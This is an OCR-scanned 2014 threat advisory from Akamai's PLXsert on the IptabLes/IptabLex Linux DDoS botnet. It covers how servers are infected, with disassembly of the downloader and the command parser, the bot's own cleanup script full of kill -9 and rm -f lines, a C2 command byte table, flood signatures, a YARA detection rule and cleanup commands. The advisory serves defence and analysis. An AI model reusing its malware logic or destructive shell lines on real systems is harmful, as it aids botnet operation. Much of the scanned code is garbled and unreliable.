
PROLEXIC 



Now part of \Akamai 



IptabLes/lptabLex DDoS Bots 



TLP- GREEN 




GSI ID: 1077 




OVERVIEW 



During Q2 2014, Akamai's Prolexic Security Engineering and Research Team (PLXsert) detected and 
measured distributed denial of service (DDoS) campaigns driven by the execution of a binary that 
produces significant payloads by executing Domain Name System (DNS) and SYN flood attacks. One 
campaign peaked at 119 Gbps bandwidth and 110 Mpps in volume. It appears to originate from Asia. 
Observed incidents in Asia and now other parts of the world suggest the binary connects back to two 
hardcoded IP addresses in China. ^ The mass infestation seems to be driven by a large number of Linux- 
based web servers being compromised, mainly by exploits of Apache Struts, Tomcat, and Elasticsearch 
vulnerabilities. 

INDICATORS OF IPTABLES/IPTABLEX INFECTION 

The principal indicator of this infection is the presence of a Linux ELF binary that creates a copy of itself 
and names it .IptabLes or .IptabLex. The leading period is intentional and is intended to help hide the 
file. This binary is crafted to infect popular Linux distributions such as Debian, Ubuntu, CentOS and Red 
Hat. 

Reports of the infection are shown in Figures 1, 2 and 3. 



^ " MMD-0025-2014 - ITW Infection of ELF .IptabLex & .IptabLes China #DDoS Bots Malware ." Malware Must Die!, 
15 June 2014. 
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IptabLes / IptabLex files and processes are running on our system 




G Updated May S 2014 at 7:27 PM 






Issue 








* 1 found some IptabLes / IptabLex files in my filesystems partition. 

* My iystem suddenly started to suffer from slow network traffic. 






Environment 




Red Hat Enterprise Linux 



Figure 1: Red Hat publicly reported the compromise to its customers 



1 D lowendtalk.com/disciJssion/28795/vps-got-hacked-with-iptables-iptablex 




Dl<cu»l«.> ^^^^^^^^^^^^^^^^^^^^ 




Home > Help > VPS got Hacked with IptabLes IptabLeX 

VPS got Hacked with IptabLes IptabLeX 




Bella Member 




Junes edited Junes in Help 




Hi. i have over 60 VPS's froin various providers here all running the exact same setup, but for the past 
month my Weioveservers VPSs keep getting compromised and sends out-going ddos attacks by using 
these 2 fiies inside /boot/ 




/boot/lptabLes 
/boot/lptabLex 




There are no login logs or anything. 




It was a compieteiy new Centos 5 32blt install with only httpd (apache) hosting a web page. 




http://www.ebe]-computing.de/JSPWiki/Wiki.jsp?page=VServer Trojan 




http: //askubuntu.com/questions/40745 7 / help-my-server-has-been-hacked-iptables-and-iptablex-in- 
boot 




http://forum.synology.com/enu/viewtopic. php?f=19&t=85779 




1 have turned off the VM for now/ instead of reinstalling it so we can possibly investigate it. 



Figure 2: A victim of IptabLes infection posted reports of the hacks on a public forum 
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I www.i<ujlansheng.tn/201<;01/Hnux-vlruses-lptabltic-lpubles/ 
• IMS bHn truulAlcd from fchinet«-. to [ English > ] [ Show onginju ] 



J Boot I ^pMLan 



; Boot I ip4«bt*i 

/SootJ IpUOLM 
7 Boot J IptobLax 

TtMf* am d«oum*n(> «t#tKh p«n( lo / >*e / fc-d / KLd dtwQWy. liul !■ (h« boot. 

Ov*d< t wMlnal Ink a / ipubLck J mc t raai tnk^d / tpuoLM n* «>m*au 
* Oi ^ MC / «e d J «^« d t IpwBl.*! 
•1 / bn / SM 



E-4 0 

• C»|/*1C/'#-B / i^KI r IPTASLG8 



Figure 3: A translated report of IPtabLex / IptabLes 

The infections occur mainly in Linux servers with vulnerable Apache Tomcat, Struts, or Elasticsearch 
software. The binary is distinct from the exploits used to control the server. Attackers are breaking into 
the servers using a known exploit^ ^ escalating privileges, dropping the binary into the compromised 
server, and executing it. 



Not all vulnerabilities lead to the entire compromise of a server. In order to escalate privileges, attackers 
must be able to execute code on a targeted server. This is often accomplished via remote code 
execution exploits or escalation through a series of exploits, such as the following: 

• Apache Struts ClassLoader Manipulation Remote Code Execution^ 

• Apache Struts Developer Mode OGNL Execution^ 



^ " Apache » Tomcat : Security Vulnerabilities ." Apache Tomcat : List of Security Vulnerabilities. MITRE 
Corporation 

^ " Apache » Struts : Security Vulnerabilities ." Apache Struts : List of Security Vulnerabilities. MITRE 
Corporation 

^ Metasploit. " Apache Struts ClassLoader Manipulation Remote Code Execution ." Exploit DB. Offensive 
Security, 5 Feb 2014. 

^ Metasploit. " Apache Struts Developer Mode OGNL Execution ." Exploit DB. Offensive Security, 05 Feb. 
2014. 
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Apache Roller OGNL Injection^ 

Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution^ 
Apache Struts includeParams Remote Code Execution^ 
Apache Struts Parameterslnterceptor Remote Code Execution^ 
Apache Tomcat Manager - Application Upload Authenticated Code Execution^ 
Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled 
Object RCE" 



-10 



There are reports of other applications being exploited, in addition to the ones mentioned, however 
Apache Struts and Tomcat seem to be the principal attack vector of entry. After the initial compromise 
and privilege escalations, attackers will proceed to drop and execute the binary. Downloader binaries or 
scripts may be used to spread and infect compromised machines with the .IptabLes bot. 



IPTABLES ELF BOT ANALYSIS 



PLXsert has analyzed the binary associated with .IptabLes infections. The IptabLes binary will only 
function properly under root privileges. In some cases, the bot will run two versions of itself: one with 
advanced features and one with standard capabilities of the original payload. The bot will set up 
persistence, propagate, and make remote connections back to its assigned Command-and-Control 
server (C2). 

Along with the infiltration of vulnerable web servers, the IptabLes bot is being used with toolkit 
components such as downloader agents. In such cases, the downloader downloads and executes the 
contents of remote files. Figure 4 shows the downloader retrieving a remote file named run.txt. 



^ Metasploit. " Apache Roller OGNL Injection ." Apache Roller OGNL Injection. Exploit DB, Offensive 
Security, 27 Nov. 2013. 

^ Metasploit. " Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution ." Exploit DB. 
Offensive Security, 27 Jul 2013 

^ Metasploit. " Apache Struts IncludeParams Remote Code Execution ." Exploit DB. Offensive Security, 5 
June 2013. 

^ Metasploit. " Apache Struts Parameterslnterceptor Remote Code Execution ." Exploit DB. Offensive 
Security, 22 Mar. 2013. 

^° Metasploit. " Apache Tomcat Manager - Application Upload Authenticated Code Execution ." Exploit DB. 
Offensive Security, 5 Feb. 2014. 

" Rgod. " Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled 
Object RCE ." Exploit DB. Offensive Security, 4 Oct. 2013. 
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push 

mou 

push 

push 

lea 

push 

call 

add 

sub 

push 

lea 

push 

lea 

push 

call 

add 

test 



offset aRun_txt ; "/fun.txf 

eax, [ebp+uat-_788C] 

duord ptf Reinote_URL[eax*ii] 

offset aSS_0 ; "^s^s" 

eax, [ebp+uar_5088] 

eax 

sprintf 
esp, 1Qh 
esp. It 

e 

eax , 
eax 
eax , 
eax 

http_download 
esp, ieh 
eax, eax 
loc 8eii8C2B 



[ebp+uar 2888] 
[ebp+uar 5088] 



Figure 4: Code snippet of a downloader downloading a remote run.txt file 



The run.txt file, shown in Figure 5, contains a pipe-delimited set of strings that define the executable 
name of the bot payload. In this case it will execute the downloaded payloads as .IptabLes or .IptabLex. 



e o o 


U run.txt 




. IptabLes 1 


. IptabLexl 





Figure 5: The contents of the run.txt file 

The remote executable to download and run is then called by an additional user-defined function 
named ShellEexec(). Figure 6 shows a snippet of the downloader preparing a URL and then executing the 
downloaded file called getsetup.rar. 

loc_80'i8BEfl : ; "/getsetup .rar" 

push offset aGetsetuprar 

mou eax, [ebp+uar_780C] 

push duord ptr Renote_URL[eax*ii] 

push offset aSS O ; ""^s^s" 

lea eax, [ebp+uar_7808] 

push eax 

call sprintf 

add esp, 1Qh 

sub esp, 8 

lea eax, [ebp+uar_7808] 

push eax 

lea eax, [ebp+uar_2808] 

push eax 

call ShellEexec 

add esp, 10h 

jmp short loc_8048C38 

Figure 6: This code snippet downloads a remote, renamed IptabLes payload 
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PAYLOAD INITIALIZATION 



When the IptabLes bot is run, it will first ensure that it isn't already running, and if it is, it will run a 
cleanup script located in memory to clean the system of prior infection(s). The original payload will be 
removed from the system and the only artifacts remaining will be the renamed .IptabLes bots and their 
startup scripts. Figure 7 shows a cleanup script. 



delallf ile 



' #! /bin/sh' , OAh 

'if [ -z $1 ] ; then', OAh 

'ps -f -C .IptabLes I grep .IptabLes I awk ', 27h, ' {print $3}',27h, ' | xar' 
' gs $0 2 ' , OAh 

' ps -f -C . IptabLes I grep . IptabLes I awk ',27h,' {print $3}',27h, ' | xar' 
'gs $0 2', OAh 

' ps -f -C . IptabLes I grep . IptabLes I awk ',27h,' {print $2}',27h, ' | xar' 
' gs $0 2 ' , OAh 

' ps -f -C . IptabLes I grep . IptabLes I awk ',27h,' {print $2}',27h, ' | xar' 
'gs $0 2', OAh 

' ps -axu I grep . IptabLes I awk ',27h,' {print $2}',27h, ' Ixargs kill -9', OAh 
' ps -axu I grep . IptabLes I awk ',27h,' {print $2}',27h, ' Ixargs kill -9', OAh 
'ps -C .IptabLes I xargs kill -9', OAh 

'ps -C .IptabLes I grep .IptabLes Ixargs kill -9', OAh 

'find / -name *ptabLes I xargs rm -f',OAh 

'find / -name .IptabLes | xargs rm -f',OAh 

'find / -name *ptabLes | xargs rm -f',OAh 

'find / -name .IptabLes I xargs rm -f',OAh 

' rm -f /boot/ . stabip ', OAh 

' rm -f /boot/ . IptabLes ', OAh 

' rm -f /etc/rc . d/init . d/IptabLes ' , OAh 

' rm -f /boot/IptabLes ' , OAh 

' rm -f /tmp/IptabLes ' , OAh 

' rm -f /usr/IptabLes ' , OAh 

' rm -f /usr /. IptabLes ', OAh 

' rm -f /etc/rc . d/rc4 . d/ *IptabLes ', OAh 

' rm -f /etc/rc . d/rcl . d/ *IptabLes ', OAh 

' rm -f /etc/rc . d/rc2 . d/ *IptabLes ', OAh 

' rm -f /etc/rc . d/rc3 . d/ *IptabLes ', OAh 

' rm -f /etc/rc . d/rcO . d/ *IptabLes ', OAh 

' rm -f /etc/rc . d/rc5 . d/ *IptabLes ', OAh 

' rm -f /etc/rc . d/rc6 . d/ *IptabLes ', OAh 

' rm -f /etc/init . d/IptabLes ' , OAh 

' rm -f /etc/rc4 .d/*IptabLes ' , OAh 

' rm -f /etc/rcl .d/*IptabLes ' , OAh 

' rm -f /etc/rc2 .d/*IptabLes ' , OAh 

' rm -f /etc/rc3 .d/*IptabLes ' , OAh 

'rm -f /etc/rcO .d/*IptabLes ' , OAh 

'rm -f /etc/rc5 .d/*IptabLes ' , OAh 

' rm -f /etc/rc6 .d/*IptabLes ' , OAh 

' rm -rf "$0" ' , OAh 

' else ' , OAh 

'if [ -z $2 ] ; then', OAh 
9, ' exit ' , OAh 
9, ' else ' , OAh 

9, 'if [ 1 -ne $2 ] ; then ', OAh 
9,9,' kill -9 $2 ' , OAh 
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9, 9, ' fi ' , OAh 
9, 9, ' fi ' , OAh 
9, 9, ' fi ' , OAh 
'exit' , OAh, 0 



Figure 7: Cleanup up script executed by the binary to prevent multiple infection 

Figure 8 shows a scenario where multiple versions of the bot are executed. In most cases where a web 
server is not run as a root administrative account but privilege escalation is possible, the bot will execute 
two versions of itself, one with advanced (pro) features. This version can be identified by the presence 
function names in the binary's string data. 



4243 




00 


00:00 .IptabLex 


4272 


tty7 


00 


00:06 Xorg 


4352 


-> 


00 


00:00 llghtdn 


4574 


-> 


00 


00:00 .IptabLes 


4912 


-> 


00 


00:00 kworker/l:2 


4937 


■> 


00 


00:00 systend-localed 


5387 


-> 


00 


00:00 .IptabLex 


5442 


-> 


00 


00:00 .IptabLes 



Figure 8: Multiple instances of a malicious binary (IptabLes and IptabLex) 

The main initialization of the .IptabLes bot starts with an attempt to establish a connection with two 
hardcoded IP addresses. The bot then sends information about the memory and CPU of the victim's 
machine using a function called sendLoginlnfo. Below is a network capture of the initial packet sent to 
identify the infected machine to an assigned C2. This signature is unique to the individual host/C2 pair. 



►Irterret Protocol Version 4, Src: 192.168.48.142 (192.168.48.142) 
►Transmission Control Protocol, Src Port: 69617 (60617), Dst Port: 
TData (157 bytes} 



, Dst: 119.145.148.165 f 
customs (1001), Seq: 1, 



Data: 7701006 



[Length: 157] 



L 



6036 
6640 
6656 
6666 
6676 
6686 
6696 
66a6 
66b6 
66c6 
66d6 



72 16 59 4e 66 66 



03 00 
49 6e 
29 20 
20 38 
00 00 

00 00 
00 00 
00 00 



77 01 
00 0d 
65 6c 
37 20 
30 20 
00 00 
00 00 

00 00 
00 00 
00 00 



e9 03 00 00 00 

00 00 00 00 df 

20 43 6f 72 65 

20 20 20 20 20 

32 2e 38 30 47 

00 00 00 00 00 

00 00 00 00 00 

00 00 00 00 00 

00 00 00 00 00 



r.YN. 



5l (Rl 
J CPU 

3 [a 2 



Figure 9: Packet capture of a binary communicating to IPs in the Chinese botnet infrastructure 



Once a connection is established, the bot awaits commands from the C2. The commands range from 
basic system modifications to launching DDoS attacks. 
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PAYLOAD ENTRENCHMENT AND PERSISTENCE 

Most observed bots that were dropped onto compromised systems were not named IptabLes at the 
time of the drop. Some names contain a random file name with a .hub extension or common file 
extensions such as zip or rar. A post-infection indication is payloads named .IptabLes or. IptabLex 
located in the /boot directory and drops of bash script files in the /etc directory. These script files run 
the .IptabLes binary on reboot, and they are symbolic links to the original file located in /boot/lptabLes. 
Figures 10 and 11 show files typically associated with an infection of .IptabLes on a system. 



root@ubuntu:~# find / -name *ptabLes 

/boot/lptabLes 

/boot/, IptabLes 

/usr/. IptabLes 

/ etc/ rc2 . d/SS5IptabLes 

/etc/rc4.d/S55IptabLes 

/etc/rc3.d/S55IptabLes 

/ etc/ rc5 . d/S55IptabLes 



Figure 10: Presence of binaries in an infected system indicates infection 



root@ubuntu 


^^^^^■# cat /boot/IptabLex 


#!/bin/sh 




/boot/ • IptabLex 




exit 0 





Figure 11: Contents of a startup script in the /boot directory indicates malware persistence 

The IptabLes ELF binaries include a function that indicates a self-updating feature. The function named 
updatesrv will connect to a remote host and attempt to download a file. It sends the remote host a 
randomly generated string as the file name, and then the remote host will send the file via an 
established TCP connection. After being decompressed, the remote file replaces the original file. 



In the lab environment, the malware attempted to contact two IP addresses located in Asia. The 
communication attempts to establish a TCP connection over port 1001 to the IPs. 

NETWORK CODE ANALYSIS 

The .IptabLes binaries were initially known to have infected victims in Asia. However, more recently 
many infections have been observed on servers hosted in the U.S. and in other regions. " 

The following is a brief analysis of the command protocol of the IptabLex threat. 



" Logging Server Compromised (IptabLes and IptabLex) ." Information Security. Stack Exchange, 27 
May 2014. 

" My Droplet Has Been Compromised and Is Sending an Outgoing Flood or DDoS. What Do I 
Do? " DigitalOcean. N.p., 25 May 2014. 
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■IptabLes command protocol 



Initial research statically reverse engineered the command structure that may have been used to 
communicate with the malware. The malware uses a simple command structure with one byte to 
identify the action and with subsequent data parsed by the associated functions. The authors of the bot 
used the zlib compression algorithm in an attempt to obfuscate the DDoS commands. 



The IptabLes bot waits for commands from a malicious actor's C2 server. The logic of this 
communication begins in a thread function named MAINPTH where the function recv{) is called. If a 
buffer size of less than 261 bytes is received, it passes the packet buffer to the MyRead() function. Figure 
12 shows code that receives and parses commands from command and control. 



.text:080iiE722 


call 


.text:080iiE727 


test 


.text:080iiE729 


nou 


.text:080iiE72B 


Jle 


.text:080iiE72D 


cnp 


.text:08 0UE732 


mou 


.text:080iiE73C 


ja 


.text:08 0iiE73E 


nou 


.text:080iiE7ii2 


nou 


.text:08 0'iE7'i5 


call 


.text:080i(E7i(A 


jnp 



recu 

eax, eax 
edi, eax 

short loc_80iiE6Bi| 
eax, 261 

duord ptr ds :g_nainsruinf o+20Ch , 0 
short loc_80iiE790 
[esp+4], eax 
[esp], ebx 

MyRead ; parse inconing connands 

loc 8ei(E6AC 



Figure 12: Code that receives and parses commands from command and control 

The MyReadO function contains the core functionality that parses the receiving packet data. Most 
commands can be identified by a one-byte check and control passes to subsequent functions that 
operate on the data from the commands. The malicious actors appear to have attempted to hide the 
DDoS commands by applying a compression algorithm to them (zlib compression wrapper). Below is a 
pseudo code version of the operation applied when an incoming DDoS command is received by the 
malware. Take note of the check for a magic value of 0xABCDEF88 in order to continue processing the 
receiving packet data. 



short len = (short*) (buff + 4) 
if *(int*)buff == 0xABCDEF88 

if len == buffer len-6 (minus the header check and the packet length 
variable ) 

Call MyRevise (void* buffer, size t buf len) 
Figure 13: Pseudo code of the operation applied to an incoming DDoS command by the malware 

The MyReviseO function is then called and the compressed payload is passed as the buffer argument. 
This function decompresses and processes the data in the buffer. The decompressed size of the buffer 
must be exactly 112 bytes. Once that condition is satisfied, the data is passed to a function called 
AddTaskO that parses the decompressed data and calls the appropriate DNS or SYN flood thread. A 
pseudo code demonstration is shown below. 
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if 
{ 

n 
n 
i 
{ 

} 
e 
{ 



( al ) 

ew_data = 0; 
ew_len = 2 04 8; 

f ( HbLDeCompress ( al + 6, a2, &new_data, Snew_len) | | new_len != 112 ) 

v2 = new data; 
Ise 

v2 = new data; 

if ( *( BYTE *) (new data + 8) & 1 ) 



v3 = * (_DWORD *) (new_data + 0x50) 
v4 = * (_DWORD *) (new_data + 0x54) 
v5 = * (_DWORD *) (new_data + 0x58) 
v6 = * (_DWORD *) (new_data + 0x5C) 
v7 = AddTask (new_data) ; 
MySend(&v3, 20); 
v2 = new_data; 

} 

} 

free ( v2 ) ; 



} 



} 



Figure 14: A pseudo code demonstration of tfie decompression and parsing of the DDoS commands 
Some of the identified DDoS commands are listed in Figure 15. 



setlocalip: 0xC8 + "IP" -> changes source IP 
setrandomip: OxCC+"IP String" -> generates a random IP 

updatepath/updatesrv: 0x33 + "new path" -> download and update malware executable 
Delete a Task: 0x10 +"Task number" -> removes a task (DDoS commands tasks) 
Delete All Tasks: 0x20 -> Delete all currently pending tasks 

Figure 15: Example DDoS commands called by the AddTask() function 

These DDoS commands are called by the AddTask() function, as shown in Figure 16. Both of the threads 
parse the data passed to them and generate unique SYN and DNS payloads. 
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U i~i e3 y 


08 


test 


al. 




OS 


jnz 


loc 


80401 Eel 



Uji ^ to 




U i-i g3 I 


es eiiciEe 








08 04C179 






es eiiciEB 


loc 


8B4C1E0: 




08 04C179 


loc 


801IC179: 


es eiiciEB 


lea 


eax, [ecll+70h] 




08 04C179 


lea 


eax, [edi+7Bh] 


es e4ciE3 


nou 


duord ptr [esp+10h], 1 




08 04C17C 


nou 


duord ptr [esp+18h], 1 


08 04C1EB 


nou 


duord ptr [esp+BCh], B 




08 04C181I 


nou 


duord ptr [esp+BCh], B 


08 04C1F3 


nou 


[esp+8], eax 




08 04C18C 


nou 


[esp+8], eax 


OS 04C1F7 


nou 


[esp+i|], edi 




BSS4C19S 


nou 


[esp+it], edi 


OS 0401 FB 


nou 


diford ptr [esp], offset Dnsf loodThread 




08 04C191I 


nou 


duord ptr [esp] , offset Si/nFloodThread 


OS B4C2B2 


call 


HbCreateThread 




08 04C19B 


call 


HbCreateThread 


BS B4C2B7 


jnp 


short loc_80itCinO 









Figure 16: DNS and SYN flood thread functions called by the AddTask() function 



The analysis conducted within the lab environment showed that the binary exhibits DDoS functionality. 
Two functions found inside the binary indicate SYN and DNS flood attack payloads. These DDoS attack 
payloads are initiated once an attacker sends the command to an infected victim machine. Payload 
functions are shown in Figure 17. 



I y I syn_packet 

m stopatk 

[7] SynFloodS 

FTI Dn&FloodSendThread 

I f I dnspacket 

I jf I ChangeDns. 

m Dns-FloodBuildThread 

I I ChangeSyn 

IT] SynFloodTh read 

[T1 SynFloodBuildThread 

m d m p a c ket 

m Dn&FloodThread 

Figure 17: Payload functions within the binary 

OBSERVED CAMPAIGN 

Below are attack signatures observed during a DDoS attack mitigated for one of our customers. The 
main attack vector was the DNS flood. More recent campaigns have relied primarily on SYN floods. 



SYN Flood 












10:41:03. 933780 


IP 


X. X. X. X. 10 535 > X.X.X.X.80 


Flags 


[S] , seq 536 


1560, win 6000, 


length 1024 












DNS Flood 












15:37:30.794536 


IP 


X.X.X.X.2679 > X.X.X.X.53: 


17664+ 


A? XX. XX. XX. 


(33) 



Figure 18: Attack signatures for a SYN flood and DNS flood used by malicious actors in this attack campaign 
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Peak bits per second (bps) 



Peak packets per second (pps) 



26.40 Gbps 



13.00 Mpps 



30.20 Gbps 



9.50 Mpps 



17.00 Gbps 



18.00 Mpps 



30.10 Gbps 



6.75 Mpps 



15.50 Gbps 



12.00 Mpps 



Figure 19: Attack scale and distribution 
MITIGATION 

Mitigating this DDoS threat involves patching and hardening the server, antivirus detection and rate 
limiting. In addition, PLXsert has created a VARA rule and a bash command to detect and eliminate this 
threat in Linux servers. 

Patches and hardening of the server 

To mitigate against possible infection from this binary it is necessary to first harden the exposed web 
platform and services by applying patches and updates from the respective software vendors and 
developers: 

• Apache Struts 2 Documentation: Security Bulletins ^^ 

• Apache TomCat vulnerabilities and fixes " 

• Elasticsearch mitigation procedures " 

In addition, there are also fundamental Linux server hardening procedures provided by SANS Institute 

(edfi-" 



The binary (ELF) will only run on Linux based systems, however attackers may be using other web 
exploits. The binary and the exploits used to break in are not co-dependent. 



^'^ " Security Bulletins." Security Bulletins . Apache Struts. 

" Security 7 ." Apache Tomcat. The Apache Software Foundation. 
^® Van Der BijI, Bouke. " Insecure Default in Elasticsearch Enables Remote Code Execution ." Bouk.co. 
May 2014. 

Lori Homsher and Tim Evans, Linux Security Checklist , Security Consensus Operational Readiness 
Evaluation. SANS Institute. 
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Antivirus detection 



Several antivirus companies including McAfee have detections for this DDoS payload (McAfee identifies 
it as a generic Linux/DDosFlooder), however the detection rate among antivirus companies is relatively 
low overall for this threat. At the time of this advisory, VirusTotal reported only 23 out of 54 antivirus 
engines detecting this threat, which is an improvement from May 2014 when the detection rate was 2 
out of 54 for this binary. 



Rate limiting 

Attackers will typically target a domain with these attacks, so a target web server will receive the SYN 
flood on port 80 or other port deemed critical for the server's operation. The DNS flood will typically 
flood a domain's DNS server with requests. Assuming the target infrastructure can support the high 
bandwidth observed by these attacks, rate limiting may be an option. 



Akamai's Generic Route Encapsulation (GRE) solution allows routing of an entire subnet(/24 minimum) 
for mitigation. The attack will be absorbed by Akamai's solutions, allowing legitimate users to continue 
to use the site and its services. 



YARA rule 

VARA is an open source tool designed to identify and classify malware threats. It is typically used as a 
host-based detection mechanism and provides a strong PCRE engine to match identifying features of 
threats at a binary level or more. PLXsert utilizes YARA rules to classify threats that persist across many 
campaigns and over time. Figure 20 contains is a YARA rule provided by PLXsert to identify the ELF 
IptabLes payload identified in this advisory. 



rule IptablesELF 
{ 

meta : 

author = "PLXSert" 

description = "Rule to detect ELF IpTable DDoS executable" 



strings : 

$elf = {If 45 4c 46} 
$stO = "SynFloodSendThread" 
$stl = "DnsFloodSendThread" 
$st2 = "SynFloodBuildThread" 
$st3 = "DnsFloodBuildThread" 
$st4 = "MAINPTH" 



$codel = 
$code2 = 
$code3 = 



"list. c" 
"main . c" 
"mypth . c" 
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$ code 4 = 


"Service . c" 




$ code 5 = 


" srvnet . c" 




$code6 = 


"ckbuf " 




$code7 = 


"udptest . c" 




condition : 






($elf at 


0 and all of ($st*) and 5 of ($code*) ) 


} 







Figure 20: YARA rule for bot identification and classification of IPTabLes/IPTabLex DDoS bots 



Bash commands 

Two bash commands from PLXsert are designed to clean a system infected with the ELF IptabLes binary. 
After running these commands, system administrators are advised to reboot the system and run a 
thorough system inspection. 



s u d 0 find 


/ -type 


f -name ' . *ptabLe* ' 


-exec rm - f { } ' ; ' 


ps -axu 1 


awk ' / \ 


IptabLe/ {print $2} ' 


1 sudo xargs kill -9 



Figure 21: Bash commands to clean a system infected with the ELF IptabLes binary 

CONCLUSION 

To prevent further infestation and spread of this botnet it is necessary to identify and apply corrective 
measures, such as those shown in this threat advisory. Command and control centers are currently 
located in Asia and the botnet has been used mainly to attack gaming and gambling verticals. 



Malicious actors behind this botnet have produced significant DDoS attack campaigns, forcing target 
companies to seek expert DDoS protection. This bot seems to be in an early development stage and 
shows several signs of instability. More refined and stable versions could emerge in future attack 
campaigns. 



PLXsert anticipates further infestation and the expansion of this botnet. Future DDoS attack campaigns 
may target other industry verticals and involve other regions. Further development will likely be driven 
by opportunities for monetization or takeover of the botnet by different groups in the DDoS-for-hire market, 



The rise in infection by the .IptabLes bot creates a risk for servers that run potentially vulnerable services 
such as Apache Struts and Tomcat. Misconfigured Elasticsearch instances have also been targeted in the 
attacks resulting in the widespread abuse of this new threat. Akamai (Prolexic) however, offers 
mitigation solutions for these types of volumetric and amplification attacks that are exhibited in 
.IptabLes bots. 



PLXsert will continue observing this botnet and will produce further advisories if warranted. 
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CONTRIBUTORS: PLXsert 



ABOUT THE PROLEXIC SECURITY ENGINEERING AND RESEARCH TEAM (PLXsert) 

PLXsert monitors malicious cyber threats globally and analyzes these attacks using proprietary 
techniques and equipment. Through research, digital forensics and post-event analysis, PLXsert is able 
to build a global view of security threats, vulnerabilities and trends, which is shared with customers and 
the security community. By identifying the sources and associated attributes of individual attacks, along 
with best practices to identify and mitigate security threats and vulnerabilities, PLXsert helps 
organizations make more informed, proactive decisions. 



ABOUT AKAMAI 

Akamai® is the leading provider of cloud services for delivering, optimizing and securing online content 
and business applications. At the core of the Company's solutions is the Akamai Intelligent Platform™, 
providing extensive reach, coupled with unmatched reliability, security, visibility and expertise. Akamai 
removes the complexities of connecting the increasingly mobile world, supporting 24/7 consumer 
demand, and enabling enterprises to securely leverage the cloud. To learn more about how Akamai is 
accelerating the pace of innovation in a hyperconnected world, please visit www.akamai.com or 
blogs.akamai.com, and follow (5)Akamai on Twitter. 
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